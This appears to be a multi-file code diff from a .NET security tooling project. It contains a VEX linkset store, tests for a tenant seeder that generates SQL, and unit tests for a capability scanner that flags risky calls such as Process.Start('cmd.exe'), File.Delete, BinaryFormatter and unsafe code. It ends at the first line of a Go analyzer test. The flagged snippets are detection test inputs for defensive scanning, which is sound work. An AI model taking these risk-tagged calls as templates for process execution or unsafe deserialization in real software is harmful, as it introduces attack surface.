return ValueTask.FromResult(linkset);
}
}
public ValueTask<VexLinkset?> GetByKeyAsync(string tenant, string vulnerabilityId, string productKey, CancellationToken cancellationToken)
{
var linksetId = VexLinkset.CreateLinksetId(tenant, vulnerabilityId, productKey);
return GetByIdAsync(tenant, linksetId, cancellationToken);
}
public ValueTask<IReadOnlyList<VexLinkset>> FindByVulnerabilityAsync(string tenant, string vulnerabilityId, int limit, CancellationToken cancellationToken)
{
lock (_lock)
{
var results = _linksets.Values
.Where(l => l.Tenant == tenant && string.Equals(l.VulnerabilityId, vulnerabilityId, StringComparison.OrdinalIgnoreCase))
.Take(limit)
.ToList();
return ValueTask.FromResult<IReadOnlyList<VexLinkset>>(results);
}
}
public ValueTask<IReadOnlyList<VexLinkset>> FindByProductKeyAsync(string tenant, string productKey, int limit, CancellationToken cancellationToken)
{
lock (_lock)
{
var results = _linksets.Values
.Where(l => l.Tenant == tenant && string.Equals(l.ProductKey, productKey, StringComparison.OrdinalIgnoreCase))
.Take(limit)
.ToList();
return ValueTask.FromResult<IReadOnlyList<VexLinkset>>(results);
}
}
public ValueTask<IReadOnlyList<VexLinkset>> FindWithConflictsAsync(string tenant, int limit, CancellationToken cancellationToken)
{
lock (_lock)
{
var results = _linksets.Values
.Where(l => l.Tenant == tenant && l.HasConflicts)
.Take(limit)
.ToList();
return ValueTask.FromResult<IReadOnlyList<VexLinkset>>(results);
}
}
public ValueTask<long> CountAsync(string tenant, CancellationToken cancellationToken)
{
lock (_lock)
{
var count = _linksets.Values.Count(l => l.Tenant == tenant);
return ValueTask.FromResult((long)count);
}
}
public ValueTask<long> CountWithConflictsAsync(string tenant, CancellationToken cancellationToken)
{
lock (_lock)
{
var count = _linksets.Values.Count(l => l.Tenant == tenant && l.HasConflicts);
return ValueTask.FromResult((long)count);
}
}
public ValueTask<IReadOnlyList<LinksetMutationEvent>> GetMutationLogAsync(string tenant, string linksetId, CancellationToken cancellationToken)
{
lock (_lock)
{
return ValueTask.FromResult<IReadOnlyList<LinksetMutationEvent>>(_mutations.ToList());
}
}
}

View File

@@ -0,0 +1,231 @@
using System;
using System.Collections.Immutable;
using System.Linq;
using StellaOps.Excititor.Core.Testing;
using Xunit;
namespace StellaOps.Excititor.Core.UnitTests.Testing;
public class AuthorityTenantSeederTests
{
[Fact]
public void DefaultTenant_HasExpectedValues()
{
var tenant = AuthorityTenantSeeder.DefaultTenant;
Assert.NotEqual(Guid.Empty, tenant.Id);
Assert.Equal("test", tenant.Slug);
Assert.Equal("Test Tenant", tenant.Name);
Assert.True(tenant.Enabled);
Assert.NotNull(tenant.Settings);
Assert.NotNull(tenant.Metadata);
}
[Fact]
public void MultiTenantFixtures_ContainsThreeTenants()
{
var fixtures = AuthorityTenantSeeder.MultiTenantFixtures;
Assert.Equal(3, fixtures.Length);
Assert.Contains(fixtures, t => t.Slug == "acme");
Assert.Contains(fixtures, t => t.Slug == "beta");
Assert.Contains(fixtures, t => t.Slug == "gamma");
}
[Fact]
public void MultiTenantFixtures_GammaIsDisabled()
{
var gamma = AuthorityTenantSeeder.MultiTenantFixtures.Single(t => t.Slug == "gamma");
Assert.False(gamma.Enabled);
}
[Fact]
public void AirgapTenant_HasRestrictedSettings()
{
var tenant = AuthorityTenantSeeder.AirgapTenant;
Assert.Equal("airgap-test", tenant.Slug);
Assert.False(tenant.Settings.AllowExternalConnectors);
Assert.True(tenant.Settings.AllowAirgapMode);
Assert.Equal("airgap", tenant.Metadata.Environment);
}
[Fact]
public void WithDefaultTenant_AddsTenantToSeedSet()
{
var seeder = new AuthorityTenantSeeder()
.WithDefaultTenant();
var tenants = seeder.GetTenants();
Assert.Single(tenants);
Assert.Equal("test", tenants[0].Slug);
}
[Fact]
public void WithMultiTenantFixtures_AddsAllFixtures()
{
var seeder = new AuthorityTenantSeeder()
.WithMultiTenantFixtures();
var tenants = seeder.GetTenants();
var slugs = seeder.GetSlugs();
Assert.Equal(3, tenants.Count);
Assert.Contains("acme", slugs);
Assert.Contains("beta", slugs);
Assert.Contains("gamma", slugs);
}
[Fact]
public void WithTenant_AddsDuplicateSlugOnce()
{
var seeder = new AuthorityTenantSeeder()
.WithDefaultTenant()
.WithDefaultTenant(); // Duplicate
var tenants = seeder.GetTenants();
Assert.Single(tenants);
}
[Fact]
public void WithCustomTenant_AddsToSeedSet()
{
var customTenant = new TestTenant(
Id: Guid.NewGuid(),
Slug: "custom",
Name: "Custom Tenant",
Description: "A custom test tenant",
Enabled: true,
Settings: TestTenantSettings.Default,
Metadata: new TestTenantMetadata("test", "local", "free", ImmutableArray<string>.Empty));
var seeder = new AuthorityTenantSeeder()
.WithTenant(customTenant);
var tenants = seeder.GetTenants();
Assert.Single(tenants);
Assert.Equal("custom", tenants[0].Slug);
}
[Fact]
public void WithTenant_SimpleOverload_CreatesMinimalTenant()
{
var seeder = new AuthorityTenantSeeder()
.WithTenant("simple", "Simple Tenant", enabled: false);
var tenants = seeder.GetTenants();
Assert.Single(tenants);
Assert.Equal("simple", tenants[0].Slug);
Assert.Equal("Simple Tenant", tenants[0].Name);
Assert.False(tenants[0].Enabled);
}
[Fact]
public void GenerateSql_ProducesValidInsertStatements()
{
var seeder = new AuthorityTenantSeeder()
.WithDefaultTenant();
var sql = seeder.GenerateSql();
Assert.Contains("INSERT INTO auth.tenants", sql);
Assert.Contains("'test'", sql);
Assert.Contains("'Test Tenant'", sql);
Assert.Contains("ON CONFLICT (slug) DO NOTHING", sql);
}
[Fact]
public void GenerateSql_ReturnsEmptyForNoTenants()
{
var seeder = new AuthorityTenantSeeder();
var sql = seeder.GenerateSql();
Assert.Equal(string.Empty, sql);
}
[Fact]
public void GenerateSql_EscapesSingleQuotes()
{
var tenant = new TestTenant(
Id: Guid.NewGuid(),
Slug: "test-escape",
Name: "O'Reilly's Tenant",
Description: "Contains 'quotes'",
Enabled: true,
Settings: TestTenantSettings.Default,
Metadata: TestTenantMetadata.Default);
var seeder = new AuthorityTenantSeeder()
.WithTenant(tenant);
var sql = seeder.GenerateSql();
Assert.Contains("O''Reilly''s Tenant", sql);
}
[Fact]
public void ChainedBuilderPattern_WorksCorrectly()
{
var seeder = new AuthorityTenantSeeder()
.WithDefaultTenant()
.WithMultiTenantFixtures()
.WithAirgapTenant()
.WithTenant("custom", "Custom");
var tenants = seeder.GetTenants();
Assert.Equal(5, tenants.Count); // 1 + 3 + 1 (custom)
// Note: airgap tenant is separate
}
[Fact]
public void TestTenantSettings_Default_HasExpectedValues()
{
var settings = TestTenantSettings.Default;
Assert.Equal(50, settings.MaxProviders);
Assert.Equal(1000, settings.MaxObservationsPerLinkset);
Assert.True(settings.AllowExternalConnectors);
Assert.False(settings.AllowAirgapMode);
Assert.Equal(365, settings.RetentionDays);
}
[Fact]
public void TestTenantSettings_Airgap_HasRestrictedValues()
{
var settings = TestTenantSettings.Airgap;
Assert.Equal(20, settings.MaxProviders);
Assert.Equal(500, settings.MaxObservationsPerLinkset);
Assert.False(settings.AllowExternalConnectors);
Assert.True(settings.AllowAirgapMode);
Assert.Equal(730, settings.RetentionDays);
}
[Fact]
public void TestTenantMetadata_Default_HasExpectedValues()
{
var metadata = TestTenantMetadata.Default;
Assert.Equal("test", metadata.Environment);
Assert.Equal("local", metadata.Region);
Assert.Equal("free", metadata.Tier);
Assert.Empty(metadata.Features);
}
[Fact]
public void MultiTenantFixtures_AcmeHasFeatures()
{
var acme = AuthorityTenantSeeder.MultiTenantFixtures.Single(t => t.Slug == "acme");
Assert.Contains("vex-ingestion", acme.Metadata.Features);
Assert.Contains("policy-engine", acme.Metadata.Features);
Assert.Contains("graph-explorer", acme.Metadata.Features);
}
}

View File

@@ -0,0 +1,806 @@
using StellaOps.Scanner.Analyzers.Lang.DotNet.Internal.Capabilities;
namespace StellaOps.Scanner.Analyzers.Lang.DotNet.Tests.Internal;
/// <summary>
/// Tests for <see cref="DotNetCapabilityScanner"/>.
/// </summary>
public sealed class DotNetCapabilityScannerTests
{
private const string TestFile = "Test.cs";
#region ScanFile - General Tests
[Fact]
public void ScanFile_NullContent_ReturnsEmpty()
{
var result = DotNetCapabilityScanner.ScanFile(null!, TestFile);
Assert.Empty(result);
}
[Fact]
public void ScanFile_EmptyContent_ReturnsEmpty()
{
var result = DotNetCapabilityScanner.ScanFile("", TestFile);
Assert.Empty(result);
}
[Fact]
public void ScanFile_WhitespaceContent_ReturnsEmpty()
{
var result = DotNetCapabilityScanner.ScanFile(" \n\t\n ", TestFile);
Assert.Empty(result);
}
[Fact]
public void ScanFile_NoPatterns_ReturnsEmpty()
{
const string code = @"
namespace Test
{
public class Program
{
public static void Main() => Console.WriteLine(""Hello"");
}
}";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Empty(result);
}
[Fact]
public void ScanFile_NormalizesBackslashesInPath()
{
const string code = @"Process.Start(""notepad.exe"");";
var result = DotNetCapabilityScanner.ScanFile(code, @"C:\src\Test.cs");
Assert.Single(result);
Assert.Equal("C:/src/Test.cs", result[0].SourceFile);
}
[Fact]
public void ScanFile_DeduplicatesSamePatternOnSameLine()
{
const string code = @"Process.Start(""cmd""); Process.Start(""notepad"");";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
// Same pattern on same line should be deduplicated
Assert.Single(result);
}
#endregion
#region ScanFile - Comment Stripping
[Fact]
public void ScanFile_IgnoresSingleLineComments()
{
const string code = @"
// Process.Start(""cmd"");
public void Method() { }";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Empty(result);
}
[Fact]
public void ScanFile_IgnoresMultiLineComments()
{
const string code = @"
/*
Process.Start(""cmd"");
File.Delete(""file.txt"");
*/
public void Method() { }";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Empty(result);
}
#endregion
#region ScanFile - Exec Patterns
[Fact]
public void ScanFile_DetectsProcessStart()
{
const string code = @"Process.Start(""notepad.exe"");";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("Process.Start", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
Assert.Equal(1.0f, result[0].Confidence);
}
[Fact]
public void ScanFile_DetectsNewProcessStartInfo()
{
const string code = @"var psi = new ProcessStartInfo(""cmd.exe"");";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("ProcessStartInfo", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsProcessStartInfoObjectInitializer()
{
const string code = @"var psi = new ProcessStartInfo { FileName = ""cmd.exe"" };";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
}
[Fact]
public void ScanFile_DetectsUseShellExecuteTrue()
{
const string code = @"psi.UseShellExecute = true;";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("UseShellExecute=true", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
#endregion
#region ScanFile - Filesystem Patterns
[Fact]
public void ScanFile_DetectsFileReadAllText()
{
const string code = @"var content = File.ReadAllText(""file.txt"");";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("File.ReadAll/WriteAll", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsFileWriteAllText()
{
const string code = @"File.WriteAllText(""file.txt"", content);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("File.ReadAll/WriteAll", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsFileDelete()
{
const string code = @"File.Delete(""file.txt"");";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("File/Directory.Delete", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsDirectoryDelete()
{
const string code = @"Directory.Delete(""dir"", true);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("File/Directory.Delete", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsFileCopy()
{
const string code = @"File.Copy(""src.txt"", ""dest.txt"");";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("File/Directory operations", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsNewFileStream()
{
const string code = @"using var fs = new FileStream(""file.bin"", FileMode.Open);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("FileStream", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsSetAccessControl()
{
const string code = @"fileInfo.SetAccessControl(security);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("SetAccessControl", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
#endregion
#region ScanFile - Network Patterns
[Fact]
public void ScanFile_DetectsNewHttpClient()
{
const string code = @"using var client = new HttpClient();";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("HttpClient", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsGetAsync()
{
const string code = @"var response = await client.GetAsync(url);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("HttpClient", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsNewWebClient()
{
const string code = @"using var client = new WebClient();";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("WebClient", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsNewSocket()
{
const string code = @"var socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("Socket/TcpClient", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsNewTcpClient()
{
const string code = @"var tcp = new TcpClient(""localhost"", 8080);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("Socket/TcpClient", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsWebRequestCreate()
{
const string code = @"var request = WebRequest.Create(url);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("WebRequest", result[0].Pattern);
}
#endregion
#region ScanFile - Environment Patterns
[Fact]
public void ScanFile_DetectsEnvironmentGetEnvironmentVariable()
{
const string code = @"var path = Environment.GetEnvironmentVariable(""PATH"");";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Environment, result[0].Kind);
Assert.Equal("Environment.GetEnvironmentVariable", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsEnvironmentSetEnvironmentVariable()
{
const string code = @"Environment.SetEnvironmentVariable(""MY_VAR"", ""value"");";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Environment, result[0].Kind);
Assert.Equal("Environment.SetEnvironmentVariable", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsEnvironmentGetEnvironmentVariables()
{
const string code = @"var envVars = Environment.GetEnvironmentVariables();";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Environment, result[0].Kind);
Assert.Equal("Environment.GetEnvironmentVariables", result[0].Pattern);
}
#endregion
#region ScanFile - Serialization Patterns (Critical for deserialization attacks)
[Fact]
public void ScanFile_DetectsBinaryFormatter()
{
const string code = @"var formatter = new BinaryFormatter();";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("BinaryFormatter", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsObjectStateFormatter()
{
const string code = @"var formatter = new ObjectStateFormatter();";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("ObjectStateFormatter", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsNetDataContractSerializer()
{
const string code = @"var serializer = new NetDataContractSerializer();";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("NetDataContractSerializer", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsLosFormatter()
{
const string code = @"var formatter = new LosFormatter();";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("LosFormatter", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsSoapFormatter()
{
const string code = @"var formatter = new SoapFormatter();";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("SoapFormatter", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsDataContractSerializer()
{
const string code = @"var serializer = new DataContractSerializer(typeof(MyClass));";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("DataContractSerializer", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsJsonDeserialize()
{
const string code = @"var obj = JsonSerializer.Deserialize<MyClass>(json);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("JsonSerializer.Deserialize", result[0].Pattern);
Assert.Equal(CapabilityRisk.Low, result[0].Risk);
}
#endregion
#region ScanFile - Crypto Patterns
[Fact]
public void ScanFile_DetectsAesCreate()
{
const string code = @"using var aes = Aes.Create();";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
Assert.Equal("Cryptography", result[0].Pattern);
Assert.Equal(CapabilityRisk.Low, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsRsaCreate()
{
const string code = @"using var rsa = RSA.Create();";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
Assert.Equal("Asymmetric crypto", result[0].Pattern);
}
#endregion
#region ScanFile - Database Patterns
[Fact]
public void ScanFile_DetectsNewSqlConnection()
{
const string code = @"using var conn = new SqlConnection(connectionString);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Database, result[0].Kind);
Assert.Equal("SqlConnection", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsNewSqlCommand()
{
const string code = @"var cmd = new SqlCommand(""SELECT * FROM Users"", conn);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Database, result[0].Kind);
Assert.Equal("SqlCommand", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsExecuteNonQuery()
{
const string code = @"cmd.ExecuteNonQuery();";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Database, result[0].Kind);
Assert.Equal("Execute*", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsExecuteReader()
{
const string code = @"using var reader = cmd.ExecuteReader();";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Database, result[0].Kind);
}
#endregion
#region ScanFile - Dynamic Code Patterns
[Fact]
public void ScanFile_DetectsDynamicMethod()
{
const string code = @"var dm = new DynamicMethod(""Test"", typeof(int), null);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("DynamicMethod", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsILGenerator()
{
const string code = @"var il = dm.GetILGenerator();";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("ILGenerator", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsCSharpScript()
{
const string code = @"var result = await CSharpScript.EvaluateAsync(code);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("CSharpScript", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsTypeBuilder()
{
const string code = @"var tb = mb.DefineType(""MyType"");";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
// TypeBuilder check expects "TypeBuilder" in the line
Assert.Empty(result); // DefineType doesn't match TypeBuilder pattern
}
#endregion
#region ScanFile - Reflection Patterns
[Fact]
public void ScanFile_DetectsAssemblyLoad()
{
const string code = @"var assembly = Assembly.Load(""MyAssembly"");";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("Assembly.Load", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsAssemblyLoadFrom()
{
const string code = @"var assembly = Assembly.LoadFrom(""plugin.dll"");";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("Assembly.Load", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsAssemblyLoadFile()
{
const string code = @"var assembly = Assembly.LoadFile(path);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
}
[Fact]
public void ScanFile_DetectsTypeInvokeMember()
{
const string code = @"type.InvokeMember(""Method"", BindingFlags.InvokeMethod, null, obj, args);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("Type.InvokeMember", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsActivatorCreateInstance()
{
const string code = @"var obj = Activator.CreateInstance(type);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("Activator.CreateInstance", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
#endregion
#region ScanFile - Native Code Patterns
[Fact]
public void ScanFile_DetectsDllImport()
{
const string code = @"[DllImport(""kernel32.dll"")]";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("DllImport", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsLibraryImport()
{
const string code = @"[LibraryImport(""user32.dll"")]";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("LibraryImport", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsMarshalPtrToStructure()
{
const string code = @"var obj = Marshal.PtrToStructure<MyStruct>(ptr);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("Marshal operations", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsMarshalAllocHGlobal()
{
const string code = @"var ptr = Marshal.AllocHGlobal(size);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
}
[Fact]
public void ScanFile_DetectsNativeLibraryLoad()
{
const string code = @"var lib = NativeLibrary.Load(""mylib.dll"");";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("NativeLibrary.Load", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsIntPtrOperations()
{
const string code = @"var ptr = new IntPtr(address);";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("IntPtr operations", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
#endregion
#region ScanFile - Unsafe Patterns
[Fact]
public void ScanFile_DetectsUnsafeBlock()
{
const string code = @"unsafe { var ptr = &value; }";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("unsafe block", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsFixedStatement()
{
const string code = @"fixed (byte* ptr = array) { }";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("fixed statement", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsStackalloc()
{
const string code = @"Span<byte> buffer = stackalloc byte[256];";
var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("stackalloc", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
#endregion
#region DotNetCapabilityEvidence Tests
[Fact]
public void Evidence_DeduplicationKey_IsCorrect()
{
var evidence = new DotNetCapabilityEvidence(
CapabilityKind.Exec,
"Test.cs",
10,
"Process.Start");
Assert.Equal("Exec|Test.cs|10|Process.Start", evidence.DeduplicationKey);
}
[Fact]
public void Evidence_ConfidenceIsClamped()
{
var evidence1 = new DotNetCapabilityEvidence(
CapabilityKind.Exec, "Test.cs", 1, "pattern",
confidence: 2.0f);
var evidence2 = new DotNetCapabilityEvidence(
CapabilityKind.Exec, "Test.cs", 1, "pattern",
confidence: -1.0f);
Assert.Equal(1.0f, evidence1.Confidence);
Assert.Equal(0.0f, evidence2.Confidence);
}
[Fact]
public void Evidence_CreateMetadata_IncludesAllFields()
{
var evidence = new DotNetCapabilityEvidence(
CapabilityKind.Exec,
"Test.cs",
10,
"Process.Start",
snippet: "Process.Start(\"cmd.exe\");",
confidence: 0.95f,
risk: CapabilityRisk.Critical);
var metadata = evidence.CreateMetadata().ToDictionary(kv => kv.Key, kv => kv.Value);
Assert.Equal("exec", metadata["capability.kind"]);
Assert.Equal("Test.cs:10", metadata["capability.source"]);
Assert.Equal("Process.Start", metadata["capability.pattern"]);
Assert.Equal("critical", metadata["capability.risk"]);
Assert.Equal("0.95", metadata["capability.confidence"]);
Assert.Contains("Process.Start", metadata["capability.snippet"]);
}
[Fact]
public void Evidence_ToLanguageEvidence_ReturnsCorrectFormat()
{
var evidence = new DotNetCapabilityEvidence(
CapabilityKind.Exec,
"Test.cs",
10,
"Process.Start");
var langEvidence = evidence.ToLanguageEvidence();
Assert.Equal(LanguageEvidenceKind.Metadata, langEvidence.Kind);
Assert.Equal("Test.cs", langEvidence.Source);
Assert.Equal("line:10", langEvidence.Locator);
Assert.Equal("Exec:Process.Start", langEvidence.Value);
}
#endregion
}

View File

@@ -0,0 +1,766 @@
using StellaOps.Scanner.Analyzers.Lang.Go.Internal;
